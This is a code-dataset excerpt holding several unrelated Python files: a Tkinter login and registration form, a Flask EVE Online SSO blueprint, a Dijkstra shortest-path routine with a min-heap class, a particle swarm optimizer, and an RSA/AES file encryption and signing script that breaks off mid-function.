lblTitle.grid(row=0,column=0,columnspan=3, pady =20)\r\n    \r\n    \r\n    \r\n    #==========================================================\r\n    Loginframe1= LabelFrame(frame1,width=2000,height=400,pady=5, font=(\"arial\", 11,\"bold\"), relief=RIDGE, bg=\"#9EF489\", bd=2)\r\n    Loginframe1.grid(row=1,column=0)\r\n\r\n    Loginframe2= LabelFrame(frame1,width=3000,height=600,pady=5, font=(\"arial\", 11,\"bold\"), relief=RIDGE, bg=\"#9EF489\", bd=2)\r\n    Loginframe2.grid(row=2,column=0)\r\n    #===================label and 
entry===============================\r\n\r\n    lblUsername = Label(Loginframe1,width=31, text=\"username* \", bg=\"#9EF489\",font=(\"helvetica\", 10,'bold'))\r\n    lblUsername.grid(row=0,column=0)\r\n    txtUsername = Entry(Loginframe1, relief =RIDGE, bd=3, justify=\"center\",font=(\"helvetica\", 10,'bold'),textvariable =username_verify)\r\n    txtUsername.grid(row=1,column=0)\r\n    lblPassword = Label(Loginframe1, text=\"password* \",width=31,justify=\"center\", bg=\"#9EF489\", font=(\"helvetica\", 10, 'bold'))\r\n    lblPassword.grid(row=2,column=0)\r\n    txtPassword = Entry(Loginframe1,width=23, justify=\"center\", show=\"*\", textvariable =password_verify)\r\n    txtPassword.grid(row=3,column=0)\r\n\r\n    #========================buttons=====================================\r\n    \r\n    btnReg = Button(Loginframe2, text=\"register\",relief=RAISED, bg='#EE1D99',padx=10,pady=10,font=(\"Arial Rounded MT Bold\",8),command= Window2)\r\n    btnReg.grid(row=0,column=0)\r\n    btnLgn = Button(Loginframe2, text=\"login\",relief=RAISED, bg='yellow',font=(\"Arial Rounded MT Bold\",8),padx=10,pady=10,command = loginchecker)\r\n    #btnLgn.bind(\"\", loginchecker)\r\n    btnLgn.grid(row=0,column=1)\r\n    btnCp= Button(Loginframe2, text=\"forget password?\",relief=RAISED,font=(\"Arial Rounded MT Bold\",8),padx=9,pady=9, bg='#B61DEE', command=forgetpass)\r\n    btnCp.grid(row=0,column=2)\r\n    label4 = Label(Loginframe2, width=31, text=\"login screen copyright ©\", bg=\"#9EF489\", font=(\"helvetica\", 10))\r\n    label4.grid(row=4,column=0,columnspan=3)\r\n    \r\n    #root.withdraw()\r\n    root.mainloop()\r\n\r\n\r\n\r\n\r\n    \r\n\r\n    \r\ndef ok():\r\n    response=messagebox.askokcancel(\"confirm\", \"do you want to continue\")\r\n    if response==1:\r\n        submitReg()\r\n\r\n\r\n    \r\n\r\ndef submitReg():\r\n    #===============================\r\n    #i=info\r\n    first_nameI=first_name.get()\r\n    last_nameI=last_name.get()\r\n    DOBI=click1.get()\r\n    DOBI1=click2.get()\r\n    DOBI2=click3.get()\r\n    SOGi=click4.get()\r\n    Genderi=click5.get()\r\n    addressi= address.get()\r\n    phone_numberi=phone_number.get()\r\n    usernamei=username.get()\r\n    passwordi=password.get()\r\n    confirmed_passwordi=confirmed_password.get()\r\n\r\n    \r\n    \r\n    \r\n    try:\r\n        if len(first_nameI)==0 or first_nameI.isdigit():\r\n            response=messagebox.showinfo(\"HELP\", \"invalid input\")\r\n            if response ==\"ok\":\r\n                FNentry.delete(0, 'end')\r\n        if len(last_nameI)==0 or last_nameI.isdigit():\r\n            response=messagebox.showinfo(\"HELP\", \"invalid input\")\r\n            if response ==\"ok\":\r\n                LNentry.delete(0, 'end')\r\n        \r\n        \r\n        \r\n        \r\n        if len(addressi)==0:\r\n            response=messagebox.showinfo(\"HELP\", \"invalid input\")\r\n            if response ==\"ok\":\r\n                ADDentry.delete(0, 'end')\r\n\r\n        if len(phone_numberi)==0 or phone_numberi.isalpha():\r\n            response=messagebox.showinfo(\"HELP\", \"invalid input\")\r\n            if response ==\"ok\": \r\n                PNentry.delete(0, 'end')\r\n\r\n        if len(usernamei)==0 or usernamei.isdigit():\r\n            response=messagebox.showinfo(\"HELP\", \"invalid input\")\r\n            if response ==\"ok\": \r\n                UNentry.delete(0, 'end')\r\n        \r\n        if confirmed_passwordi == passwordi and re.search(\"[a-z]\", passwordi) and re.search(\"[a-z]\", confirmed_passwordi) and re.search(\"[A-Z]\",passwordi) and re.search(\"[A-Z]\", confirmed_passwordi) and confirmed_passwordi.isalnum() and passwordi.isalnum() and len(confirmed_passwordi)>8 and len(passwordi) >8:\r\n            file= open(usernamei, \"w\")\r\n            file.write(usernamei + \"\\n\")\r\n            file.write(confirmed_passwordi + \"\\n\")\r\n            file.write(phone_numberi + \"\\n\") \r\n            file.write(first_nameI + \"\\n\")\r\n            file.write(last_nameI + \"\\n\")\r\n            file.write(addressi + \"\\n\")\r\n            file.write(Genderi + \"\\n\")\r\n            file.write(SOGi + \"\\n\")\r\n            file.write(DOBI + \"\\n\")\r\n            file.write(DOBI1 + \"\\n\")\r\n            file.write(DOBI2 + \"\\n\")\r\n            \r\n            file.close()    \r\n            Reg.destroy()\r\n            \r\n            \r\n            \r\n\r\n\r\n        else:\r\n            response=messagebox.showinfo(\"HELP\", \"invalid input\")\r\n            if response ==\"ok\":\r\n                Pentry.delete(0, 'end')\r\n                FCentry.delete(0, 'end')\r\n        \r\n\r\n        \r\n    except (FileNotFoundError, FileExistsError):\r\n        response=messagebox.askokcancel(\"HELP\", \"do you want to quit the registration process\")\r\n        if response:\r\n            Reg.destroy()\r\n        else:\r\n            messagebox.showinfo(\"RETURN\", \"you are going back to the registration page\")\r\n\r\n    \r\n\r\n\r\n\r\n\r\ndef Window2():\r\n    global Reg\r\n    global Window2\r\n    global frame2\r\n    global framer\r\n\r\n    global first_name\r\n    global last_name\r\n    global DOB\r\n    global SOG\r\n    global Gender\r\n    global address\r\n    global phone_number\r\n    global username\r\n    global password\r\n    global confirmed_password\r\n\r\n    #=========global entry============\r\n    global label5\r\n    global FNentry\r\n    global LNentry\r\n    global ADDentry\r\n    global click1\r\n    global click2\r\n    global click3\r\n    global click4\r\n    global click5\r\n    global PNentry\r\n    global UNentry\r\n    global Pentry\r\n    global FCentry\r\n    global lblTitle\r\n\r\n    root.deiconify()\r\n\r\n    first_name=StringVar()\r\n    last_name=StringVar()\r\n    DOB= StringVar()\r\n    SOG=StringVar()\r\n    Gender=StringVar()\r\n    address=StringVar()\r\n    phone_number=StringVar()\r\n    username= StringVar()\r\n    password=StringVar()\r\n    confirmed_password=StringVar()\r\n\r\n    Reg=Toplevel()\r\n    Reg.title(\"registration page\")\r\n    Reg.iconbitmap(\"favico.ico\")\r\n    Reg.geometry(\"1000x450+100+50\")\r\n    bgf= ImageTk.PhotoImage(Image.open(\"bgfor1.jpg\"))\r\n    lblTitle=Label(Reg, image=bgf)\r\n    lblTitle.place(x=0,y=0, relwidth=1,relheight=1)\r\n\r\n    Reg.resizable(width=False, height=False)\r\n    Reg.config(bg=\"brown\")\r\n\r\n    frame4=Frame(Reg, bg =\"#DBDDDA\", relief=FLAT,bd=2)\r\n    frame4.place(x=150,y=100, width=689,height=270)\r\n\r\n    #============combobox details for states===========\'\r\n    options=['abia',\"adamawa\",\"akwa-ibom\", 'anambra', 'Bauchi','Bayelsa','Benue','Borno','Cross River','Delta',\r\n    'Ebonyi','Edo','Ekiti','Enugu','Gombe','Imo','Jigawa','Kaduna','Kano','Katsina','Kebbi','Kogi','Kwara','Lagos','Nasarawa',\r\n    'Niger','Ogun','Ondo','Osun','Oyo','Plateau','Rivers','Sokoto','Taraba','Yobe','Zamfara','F.C.T']\r\n    options1=['male','female','others']\r\n    options2=['1','2','3','4','5','6','7','8','9','10','11','12','13','14','15','16','17','18','19','20','21','22','23','24','25','26','27','28',\r\n    '29','30','31']\r\n    options3=['January','February','March','April','May','June','July','August','September', 'October','November','December']\r\n    #options4=['Monday','Tuesday','Wednesday','Thursday','Friday','Saturday']\r\n    options5=['1960','1961','1962','1963','1964','1965','1966','1967','1968','1969','1970','1971','1972','1973','1974',\r\n    '1975', '1976','1977','1978','1979','1980','1981','1982','1983','1984','1985','1986','1987','1988','1989','1990',\r\n    '1991','1992','1993','1994','1995','1996','1997','1998']\r\n\r\n\r\n    #=============registration details========\r\n    framet=LabelFrame(frame4, bg =\"white\", relief=RIDGE, bd =2)\r\n    framet.grid(row=0,column=0)\r\n    frame2=LabelFrame(framet, bg =\"#DBDDDA\",width=200, height=2000, relief=FLAT, bd =1)\r\n    frame2.grid(row=0,column=0)\r\n    
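# Right-hand column of the registration form: the address, phone number and credential entries are built inside 'framer' below.\r\n    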
framer=LabelFrame(framet, bg =\"#DBDDDA\",width=600, height=150, relief=FLAT, bd =1)\r\n framer.grid(row=0,column=1)\r\n frameb=LabelFrame(Reg, bg =\"#20165B\",width=30, height=20, relief=FLAT, bd =1)\r\n frameb.place(x=430,y=350, width=130,height=58)\r\n \r\n framey=LabelFrame(frameb, bg =\"white\", relief=RIDGE, bd =2)\r\n framey.pack()\r\n \r\n #===============================================================================\r\n label5=Label(frame2, text=\"first name\", width=30, bg='#DBDDDA',font=(\"Arial Rounded MT Bold\",13))\r\n label5.grid(row=1,padx=1,sticky=W)\r\n FNentry =Entry(frame2, relief= GROOVE,bg='white', bd=1, width=30, justify= CENTER, textvariable= first_name)\r\n FNentry.grid(row= 2, padx=1,ipady=3)\r\n\r\n LNlabel=Label(frame2, text=\"last name\", width=30, bg='#DBDDDA',font=(\"Arial Rounded MT Bold\",13))\r\n LNlabel.grid(row= 3, padx=1)\r\n LNentry =Entry(frame2, relief= GROOVE,bg='white', bd=1, width=30, justify= CENTER, textvariable=last_name)\r\n LNentry.grid(row= 5,padx=1,ipady=3)\r\n #=========================================================\r\n click1=StringVar()\r\n\r\n DOBbox= ttk.Combobox(frame2, value=options2,width=2)\r\n DOBbox.current(0)\r\n DOBbox.place(x=75,y=128)\r\n DOBlabel=Label(frame2, text=\"date of birth\", bg='#DBDDDA',font=(\"Arial Rounded MT Bold\",13))\r\n DOBlabel.grid(row= 6, padx=1)\r\n DOBlabel=Label(frame2, text=\" \", bg='#DBDDDA',font=(\"Arial Rounded MT Bold\",13))\r\n DOBlabel.grid(row= 8, padx=1)\r\n #========\r\n click2 =StringVar()\r\n DOBbox1=ttk.Combobox(frame2,value=options3,width=10)\r\n DOBbox1.current(0)\r\n DOBbox1.place(x=120,y=128)\r\n\r\n #======\r\n click3 =StringVar()\r\n DOBbox2=ttk.Combobox(frame2,value=options5, width=4)\r\n DOBbox2.current(0)\r\n DOBbox2.place(x=210,y=128)\r\n #DOBentry =Entry(frame2, ef= RIDGE, bd=3, width=20, justify= CENTER, textvariable=DOB)\r\n #DOBentry.grid(row= 8, column=0)\r\n\r\n #=========================================================\r\n SOGlabel=Label(frame2, text=\"state of origin\", width=30, bg='#DBDDDA',font=(\"Arial Rounded MT Bold\",13))\r\n SOGlabel.grid(row= 9, column=0)\r\n #SOGentry =Entry(frame2, relief= RIDGE, bd=3, width=20, justify= CENTER, textvariable=SOG)\r\n #SOGentry.grid(row= 11, column=0)\r\n click4 =StringVar()\r\n DOBbox3=ttk.Combobox(frame2,value=options, width=25)\r\n DOBbox3.current(0)\r\n DOBbox3.grid(row=11, column=0)\r\n #===========================================================================\r\n\r\n Glabel=Label(frame2, text=\"Gender\", width=30, bg='#DBDDDA',font=(\"Arial Rounded MT Bold\",13))\r\n Glabel.grid(row= 12, column=0)\r\n\r\n\r\n click5 =StringVar()\r\n DOBbox4=ttk.Combobox(frame2,value=options1, width=25)\r\n DOBbox4.current(0)\r\n DOBbox4.grid(row=13, column=0,pady=5)\r\n\r\n #======================================================\r\n #Gentry =Entry(frame2, relief= RIDGE, bd=3, width=20, justify= CENTER,textvariable=Gender)\r\n #Gentry.grid(row= 12, column=0)\r\n\r\n #============labelframe2====================================================================\r\n ADDlabel=Label(framer, text=\"address\", width=30, bg='#DBDDDA',font=(\"Arial Rounded MT Bold\",13))\r\n ADDlabel.grid(row= 12, column=0)\r\n ADDentry =Entry(framer, relief= GROOVE, bd=1, bg='white', width=30, justify= CENTER, textvariable=address)\r\n ADDentry.grid(row= 17, column=0,ipady=3)\r\n PNlabel=Label(framer, text=\"phone number\", width=30, bg='#DBDDDA',font=(\"Arial Rounded MT Bold\",13))\r\n PNlabel.grid(row= 18, column=0)\r\n PNentry =Entry(framer, relief= 
GROOVE,bg='white', bd=1, width=30, justify= CENTER,textvariable=phone_number)\r\n PNentry.grid(row=19, column=0,ipady=3)\r\n UNlabel=Label(framer, text=\"username\", width=30, bg='#DBDDDA',font=(\"Arial Rounded MT Bold\",13))\r\n UNlabel.grid(row= 20, column=0)\r\n UNentry =Entry(framer, relief= GROOVE,bg='white', bd=1, width=30, justify= CENTER, textvariable=username)\r\n UNentry.grid(row= 23, column=0,ipady=3)\r\n Plabel=Label(framer, text=\"password\", width=30, bg='#DBDDDA',font=(\"Arial Rounded MT Bold\",13))\r\n Plabel.grid(row= 24, column=0)\r\n Pentry =Entry(framer, relief= GROOVE,bg='white', bd=1, width=30, justify= CENTER, show=\"*\", textvariable=password)\r\n Pentry.grid(row= 26, column=0,ipady=3)\r\n FClabel=Label(framer, text=\"confirmed password\", width=30, bg='#DBDDDA',font=(\"Arial Rounded MT Bold\",13))\r\n FClabel.grid(row= 27, column=0)\r\n FCentry =Entry(framer, relief= GROOVE,bg='white', bd=1, width=30, justify= CENTER, show=\"*\", textvariable=confirmed_password)\r\n FCentry.grid(row= 29, column=0,pady=3,ipady=2)\r\n \r\n #==================buttons===================================\r\n\r\n bitt1=Button(framey, width=20, text=\"submit\",bg=\"#20165B\", fg=\"#EC9787\",relief=FLAT,font=(\"Arial Rounded MT Bold\",25),command=submitReg)\r\n bitt1.pack()#grid(row= 30, column=0)\r\n\r\n Reg.mainloop()\r\n\r\n\r\n\r\n\r\n\r\n\r\nWindow1()\r\n ","sub_path":"ca2.py","file_name":"ca2.py","file_ext":"py","file_size_in_byte":47921,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"632979213","text":"# -*- encoding: utf-8 -*-\nfrom flask import Blueprint\nfrom flask import redirect\nfrom flask import request\nfrom flask import url_for\nfrom flask import flash\nfrom urlparse import urlparse\nfrom urlparse import urljoin\nfrom flask_login import current_user\nfrom flask_login import login_required\nfrom flask_login import logout_user\nfrom flask_oauthlib.client import OAuthException\n\nfrom lazyblacksmith.extension.esipy import esisecurity\nfrom lazyblacksmith.extension.oauth import eve_oauth\nfrom lazyblacksmith.models import db\nfrom lazyblacksmith.utils.login import check_login_user\n\nsso = Blueprint('sso', __name__)\n\n\n@sso.route('/login')\ndef login():\n return eve_oauth.authorize(\n callback=url_for(\n 'sso.callback',\n next='home.index',\n _external=True\n ),\n )\n\n\n@sso.route('/add_alt')\ndef add_alt():\n return eve_oauth.authorize(\n callback=url_for(\n 'sso.callback',\n next='account.index',\n _external=True\n ),\n )\n\n\n@sso.route('/logout')\n@login_required\ndef logout():\n logout_user()\n flash(\"You have been logged out successfully.\", 'info')\n return redirect(url_for(\"home.index\"))\n\n\n@sso.route('/callback')\ndef callback():\n auth_response = eve_oauth.authorized_response()\n if auth_response is None:\n return 'Access denied: reason=%s error=%s' % (\n request.args['error_reason'],\n request.args['error_description']\n ), 403\n\n if isinstance(auth_response, OAuthException):\n return 'Error while validating your authentification', 403\n\n esisecurity.update_token(auth_response)\n cdata = esisecurity.verify()\n\n if current_user.is_authenticated:\n check_login_user(cdata, auth_response, current_user)\n else:\n check_login_user(cdata, auth_response)\n\n # redirect\n try:\n return redirect(url_for(request.args.get('next')))\n except:\n return redirect(url_for(\"home.index\"))\n\n\n@eve_oauth.tokengetter\ndef eve_oauth_tokengetter(token=None):\n if current_user.is_authenticated:\n 
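# Refresh the ESI access token transparently when it is within 60 seconds of expiry, and persist the refreshed token on the current user.\n        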
esisecurity.update_token(current_user.get_sso_data())\n        if esisecurity.is_token_expired(offset=60):\n            token_response = esisecurity.refresh()\n            current_user.update_token(token_response)\n            db.session.commit()\n        return (current_user.access_token,)\n    return None\n","sub_path":"lazyblacksmith/views/user/sso.py","file_name":"sso.py","file_ext":"py","file_size_in_byte":2380,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"115511565","text":"import heapq\n\ndef dijkstra(graphEdges, start, goal):\n    # graphEdges: List[List[List[destination, distance]]]\n    # list of outgoing edges for each node in a graph\n    # every edge is [destination, distance]\n    num_nodes = len(graphEdges)\n\n    tent_distances = {node: float('inf') for node in range(num_nodes)}\n    tent_distances[start] = 0\n\n    visited = {node: False for node in range(num_nodes)}\n\n    # lazy-deletion priority queue of (tentative distance, node) pairs;\n    # heapq is used here because the standalone MinHeap exercise below is defined after main() runs at import time\n    dist_heap = [(0, start)]\n\n    while dist_heap:\n        curr_dist, curr_node = heapq.heappop(dist_heap)\n        if curr_node == goal:\n            return curr_dist\n        if visited[curr_node]:\n            continue  # stale entry left behind by an earlier relaxation\n        visited[curr_node] = True\n\n        for outgoing_edge in graphEdges[curr_node]:\n            [neighbor, distance_from_curr] = outgoing_edge\n            if not visited[neighbor]: # if the destination node is not already visited\n                calculated_dist = curr_dist + distance_from_curr\n\n                if calculated_dist < tent_distances[neighbor]:\n                    tent_distances[neighbor] = calculated_dist\n                    heapq.heappush(dist_heap, (calculated_dist, neighbor))\n\n    return float('inf')  # the goal is unreachable from the start node\n\n\ndef main():\n    # Edge-list representation of a weighted graph: entry i holds node i's [destination, distance] pairs\n    graph = [\n        [[1, 1], [2, 4]],  # 0 -> 1 (weight 1), 0 -> 2 (weight 4)\n        [],\n        [[1, 1], [3, 2]],  # 2 -> 1 (weight 1), 2 -> 3 (weight 2)\n        []\n    ]\n\n    print(dijkstra(graph, start=0, goal=3))  # 6\n\n\nmain()\n\n\n\n\n\n\n\n\n\n# Do not edit the class below except for the buildHeap,\n# siftDown, siftUp, peek, remove, and insert methods.\n# Feel free to add new properties and methods to the class.\n\n# static methods\n# O(1) time, O(1) space\ndef swap(i, j, heap):\n    heap[i], heap[j] = heap[j], heap[i]\nclass MinHeap:\n    def __init__(self, array):\n        # Do not edit the line below.\n        self.heap = self.__buildHeap(array)\n\n    \"\"\"\n    INTERNAL API\n    \"\"\"\n    # Implementation using siftDown(), O(n) time, O(1) space\n    def __buildHeap(self, array):\n        self.heap = array\n\n        n = self.getLength()\n        # index of last element - 1 = (n - 1) - 1 = n - 2\n        parentIndex = (n - 2) // 2\n        # [0, parentIndex] -- all nodes are parents from this moment\n        for i in reversed(range(parentIndex + 1)):\n            self.__siftDown(i)\n\n        return self.heap\n\n    # implementation using siftUp(), O(n log(n)) time | O(1) space since all actions are in-place\n    # def __buildHeap(self, array):\n    #     # Write your code here.\n    #     self.heap = array\n    #\n    #     for i in range(1, len(array)):\n    #         self.__siftUp(i)\n    #\n    #     return self.heap\n\n    # O(log(n)) time | O(1) space\n    # def __siftDown(self, index):\n    #     # Write your code here.\n    #     # TODO do we assume that the heap property for all other nodes holds when calling this method?\n    #     if index >= 0:\n    #         n = self.getLength()\n    #\n    #         while index < n - 1:\n    #             c1_idx = 2 * index + 1 # child 1 index\n    #             c2_idx = 2 * index + 2 # child 2 index\n    #             child_indices = [c1_idx, c2_idx]\n    #\n    #             c1 = self.heap[c1_idx] if c1_idx < n else float('inf') # child 1's value (if applicable)\n    #             c2 = self.heap[c2_idx] if c2_idx < n else float('inf') # child 2's value (if applicable)\n    #             children = [c1, c2]\n    #\n    #             if self.heap[index] <= min(children):\n    #                 break\n    #             else:\n    #                 min_child_idx = child_indices[0 if c1 < c2 else 1]\n    #                 swap(index, min_child_idx, self.heap)\n    #                 index = min_child_idx\n    #\n    #     return index\n    #\n    #\n\n    # O(log(n)) time | O(1) space\n    def __siftDown(self, index):\n        # Write your code here.\n        # TODO do we assume that 
the heap property for all other nodes holds when calling this method?\n # This check is to basically remove the malicious indices right away\n if index >= 0:\n n = self.getLength()\n\n c1_idx = 2 * index + 1 # child 1 index\n\n while c1_idx < n:\n c2_idx = c1_idx + 1 # child 2 index = 2 * index + 2\n\n min_child_idx = c1_idx if (c2_idx >= n or self.heap[c1_idx] < self.heap[c2_idx]) else c2_idx\n\n if self.heap[index] <= self.heap[min_child_idx]:\n break # break the loop if already in the right position\n else:\n swap(index, min_child_idx, self.heap)\n index = min_child_idx\n c1_idx = 2 * index + 1\n\n return index\n\n # O(log(n)) time | O(1) space\n def __siftUp(self, index):\n # Write your code here.\n if 0 < index < self.getLength():\n parentIndex = (index - 1) // 2\n\n while index > 0 and self.heap[parentIndex] > self.heap[index]:\n swap(parentIndex, index, self.heap)\n index = parentIndex\n parentIndex = (index - 1) // 2\n\n \"\"\"\n EXTERNAL API\n \"\"\"\n # O(1) time | O(1) space\n def peek(self):\n # Write your code here.\n if self.heap is None or self.heap == []:\n return None\n else:\n return self.heap[0]\n\n # O(log(n)) time, O(1) time\n def remove(self):\n # Write your code here.\n n = self.getLength()\n # put the current min to the last rightmost position at the deepest level of the heap\n swap(0, n - 1, self.heap)\n # get the last element, which now is the previous root of the heap\n removed_min = self.heap.pop()\n # put the element to the proper place\n self.__siftDown(0)\n # return the value we removed\n return removed_min\n\n # O(log(n)) | O(1) time\n def insert(self, value):\n # Write your code here.\n self.heap.append(value) # append new value at the end\n n = self.getLength() # updated length of the heap array\n self.__siftUp(n - 1) # sift up the newly inserted last element to appropriate position\n\n # My helper methods\n # O(1) time | O(1) space\n def getLength(self):\n return len(self.heap)\n","sub_path":"python/algorithms/graphs/dijkstra.py","file_name":"dijkstra.py","file_ext":"py","file_size_in_byte":5864,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"422172848","text":"'''\r\nAlex Costanzino\r\nMSc student in Artificial Intelligence\r\n@ Alma Mater Studiorum, University of Bologna\r\nMarch, 2021\r\n'''\r\n\r\nimport random\r\n\r\nclass Particle:\r\n def __init__(self, x0):\r\n self.velocity = list()\r\n \r\n self.position = list()\r\n self.best_position = list()\r\n \r\n # Default values to force the first iteration\r\n self.fitness = -1\r\n self.best_fitness = -1\r\n \r\n ''' Initialize random velocity and the user-defined initial position '''\r\n for i in range(0, swarm_dimension):\r\n self.velocity.append(random.uniform(-1,1))\r\n self.position.append(x0[i])\r\n \r\n def evaluation(self, fitness, penalty):\r\n ''' Compute the value of the fitness function at the current position '''\r\n self.fitness = fitness(self.position, penalty)\r\n \r\n ''' Chech if the current position is better than the previous, if so, update the best position and the best error '''\r\n if (self.fitness < self.best_fitness) or (self.best_fitness == -1):\r\n self.best_position = self.position\r\n self.best_fitness = self.fitness\r\n \r\n def update_velocity(self, swarm_best_position):\r\n ''' Hyperparameters setup: inertia, cognitive term, social term. 
See: https://www.mdpi.com/2504-4990/1/1/10 '''\r\n omega, phi_c, phi_s = 0.729, 2.025, 2.025\r\n #omega, phi_c, phi_s = 0.5, 1.25, 1.025\r\n \r\n for i in range(0, swarm_dimension):\r\n rand1, rand2 = random.random(), random.random()\r\n \r\n ''' Cognitive velocity is based on the individual behaviour, while the social velocity is based on the swarm behaviour ''' \r\n cognitive_velocity = phi_c * rand1 * (self.best_position[i] - self.position[i])\r\n social_velocity = phi_s * rand2 * (swarm_best_position[i] - self.position[i])\r\n \r\n self.velocity[i] = (omega * self.velocity[i]) + cognitive_velocity + social_velocity\r\n \r\n def update_position(self, bounds):\r\n for i in range(0, swarm_dimension):\r\n self.position[i] = self.position[i] + self.velocity[i]\r\n \r\n ''' If the position it's out of the user-defined boundaries we can push the particle in (it's an improvement of the algorithm) '''\r\n if self.position[i] > bounds[i][1]:\r\n self.position[i] = bounds[i][1]\r\n \r\n if self.position[i] < bounds[i][0]:\r\n self.position[i] = bounds[i][0]\r\n \r\ndef optimize(fitness, penalty, x0, bounds, n_particles, max_iter):\r\n global swarm_dimension\r\n swarm_dimension = len(x0)\r\n \r\n swarm_best_position = list()\r\n swarm_best_fitness = -1\r\n \r\n ''' Initialization of the swarm '''\r\n swarm = list()\r\n for _ in range(0, n_particles):\r\n swarm.append(Particle(x0))\r\n \r\n ''' Optimization loop '''\r\n it = 0\r\n while it < max_iter:\r\n ''' Evaluate the fitness of each particle in the swarm '''\r\n for k in range(0, n_particles):\r\n swarm[k].evaluation(fitness, penalty)\r\n \r\n ''' Check if the current particle it's the best of the swarm, if so, update best position and best fitness of the swarm'''\r\n if (swarm[k].fitness < swarm_best_fitness) or swarm_best_fitness == -1:\r\n swarm_best_position = list(swarm[k].position)\r\n swarm_best_fitness = float(swarm[k].fitness)\r\n \r\n ''' Update positions and velocities of the swarm '''\r\n for k in range(0, n_particles):\r\n swarm[k].update_velocity(swarm_best_position)\r\n swarm[k].update_position(bounds)\r\n \r\n it += 1\r\n \r\n print('Results: the best fitness value is F(x*) = {}, at x* = {}.'.format(swarm_best_fitness, swarm_best_position))\r\n \r\n return swarm_best_position\r\n ","sub_path":"particle_swarm_optimization_var.py","file_name":"particle_swarm_optimization_var.py","file_ext":"py","file_size_in_byte":3924,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"239190563","text":"from Crypto.PublicKey import RSA\nfrom Crypto.Cipher import AES\nfrom Crypto.Cipher import PKCS1_OAEP\nfrom Crypto.Random import get_random_bytes\n# from Crypto.Util.Padding import pad, unpad\nfrom Crypto.Signature import pkcs1_15\nfrom Crypto.Hash import SHA256\nimport os.path\nimport argparse\nimport sys\n\nASYM_KEY1 = 'rsa-encryption'\nASYM_KEY2 = 'rsa-signing'\n\nAES_KEY_SIZE_BITS = 256\nRSA_KEY_SIZE_BITS = 2048\n\ndef generate_asym_keys(name):\n # Generate a public/private key pair\n new_key = RSA.generate(RSA_KEY_SIZE_BITS)\n\n # The public/private key pair in PEM format\n private_key = new_key.exportKey('PEM')\n public_key = new_key.publickey().exportKey('PEM')\n\n print('>> Generated RSA private key [%s-private]: \\n\\n%s\\n' % (name, private_key))\n fd = open('keys/%s-private' % name, 'wb')\n fd.write(private_key)\n fd.close()\n\n print('>> Generated RSA public key [%s-public]: \\n\\n%s\\n' % (name, public_key))\n fd = open('keys/%s-public' % name, 'wb')\n fd.write(public_key)\n 
fd.close()\n\ndef generate_keys(force_generation=False):\n print('>> Generating asymmetric keys')\n\n # asymmetric key pair 1\n print('>> Checking if key pair 1, [rsa-encryption-public] and [rsa-encryption-private], already exists')\n if force_generation or not os.path.exists('keys/%s-public' % ASYM_KEY1) or not os.path.exists('keys/%s-private' % ASYM_KEY1):\n if not force_generation:\n print('>> Key pair 1 does not exist... generating...')\n else:\n print('>> Forcing regeneration of keys...')\n generate_asym_keys(ASYM_KEY1)\n else:\n print('>> Key pair 1 already exists... skipping key generation...')\n\n # asymmetric key pair 2\n print('>> Checking if key pair 1, [rsa-signing-public] and [rsa-signing-private], already exists')\n if force_generation or not os.path.exists('keys/%s-public' % ASYM_KEY2) or not os.path.exists('keys/%s-private' % ASYM_KEY2):\n if not force_generation:\n print('>> Key pair 2 does not exist... generating...')\n else:\n print('>> Forcing regeneration of keys...')\n generate_asym_keys(ASYM_KEY2)\n else:\n print('>> Key pair 2 already exists... skipping key generation...')\n\ndef encrypt_file(data_file_name, rsa_key_file):\n print('>> Encrypting data file [%s]' % data_file_name)\n with open(data_file_name, 'rb') as data, open(rsa_key_file, 'r') as rsa_key_fd, open('encrypted_data', 'wb') as encrypted_file:\n print('>> Loading [%s]' % rsa_key_file)\n rsa_key = RSA.import_key(rsa_key_fd.read())\n\n aes_session_key = get_random_bytes(AES_KEY_SIZE_BITS // 8)\n # aes_session_key = b'deadbeefdeadbeefdeadbeefdeadbeef'\n print('>> Generated random %d bit key:' % (AES_KEY_SIZE_BITS))\n # print('%s' % aes_session_key)\n print('\\n%s\\n' % aes_session_key.hex())\n\n print('>> Encrypting AES key using [%s]' % rsa_key_file)\n cipher_rsa = PKCS1_OAEP.new(rsa_key)\n encrypted_aes_session_key = cipher_rsa.encrypt(aes_session_key)\n\n cipher_aes = AES.new(aes_session_key, AES.MODE_EAX)\n\n print('>> Encrypting [%s] using AES key' % data_file_name)\n ciphertext, tag = cipher_aes.encrypt_and_digest(data.read())\n [ encrypted_file.write(x) for x in (encrypted_aes_session_key, cipher_aes.nonce, tag, ciphertext) ]\n\n print('>> Encrypted file contents [encrypted_data]:')\n # print('%s' % ciphertext)\n print('\\n%s\\n' % ciphertext.hex())\n\ndef decrypt_file(data_file_name, rsa_key_file):\n print('>> Decrypting data file [%s]' % data_file_name)\n with open(data_file_name, 'rb') as data, open(rsa_key_file, 'r') as rsa_key_fd, open('decrypted_data', 'wb') as decrypted_file:\n print('>> Loading [%s]' % rsa_key_file)\n rsa_key = RSA.import_key(rsa_key_fd.read())\n\n encrypted_aes_session_key, nonce, tag, ciphertext = [ data.read(x) for x in (rsa_key.size_in_bytes(), 16, 16, -1) ]\n\n print('>> Decrypting encrypted AES key using [%s]' % rsa_key_file)\n cipher_rsa = PKCS1_OAEP.new(rsa_key)\n aes_session_key = cipher_rsa.decrypt(encrypted_aes_session_key)\n print('>> Decrypted AES key:')\n # print('%s' % aes_session_key)\n print('\\n%s\\n' % aes_session_key.hex())\n\n print('>> Decrypting [%s] using decrypted AES key' % data_file_name)\n cipher_aes = AES.new(aes_session_key, AES.MODE_EAX, nonce)\n decrypted_data = cipher_aes.decrypt_and_verify(ciphertext, tag)\n\n decrypted_file.write(decrypted_data)\n print('>> Decrypted file contents [decrypted_data]: \\n\\n%s\\n' % repr(decrypted_data.decode('utf-8')))\n\ndef sign(file_name, rsa_key_file):\n print('>> Signing file')\n with open(file_name, 'rb') as data, open(rsa_key_file, 'r') as rsa_key_fd, open('data_signature', 'wb') as signature_file:\n 
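# The plaintext is hashed with SHA-256 and the digest is signed with the RSA signing key (PKCS#1 v1.5); the signature is written to 'data_signature'.\n        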
